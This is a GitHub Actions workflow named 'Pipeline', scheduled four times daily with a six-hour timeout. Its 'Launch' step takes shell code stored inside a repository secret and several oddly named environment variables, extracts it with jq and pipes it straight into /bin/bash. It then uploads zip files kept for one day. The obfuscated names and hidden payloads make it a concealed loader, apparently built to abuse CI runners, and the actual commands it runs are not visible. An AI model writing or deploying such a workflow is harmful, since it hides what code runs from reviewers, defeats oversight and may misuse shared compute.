name: Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '47 1,7,13,19 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          lvp2344: ${{ secrets.lvp2344 }}
        run: |
          printf '%s' "$lvp2344" | jq -r .efbbb6 | /bin/bash
          echo $gmz565 | jq -r .j2961 | /bin/bash
          echo $uqbcy4 | jq -r .o04451 | /bin/bash
          echo $lwgf10053 | jq -r .ndyp4717 | /bin/bash
          echo $yvrc47552 | jq -r .pqknd18 | /bin/bash
          printf '%s' "$rto38551" | jq -r .ci8881 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: mSgnlTfi
          path: "*.zip"
          retention-days: 1
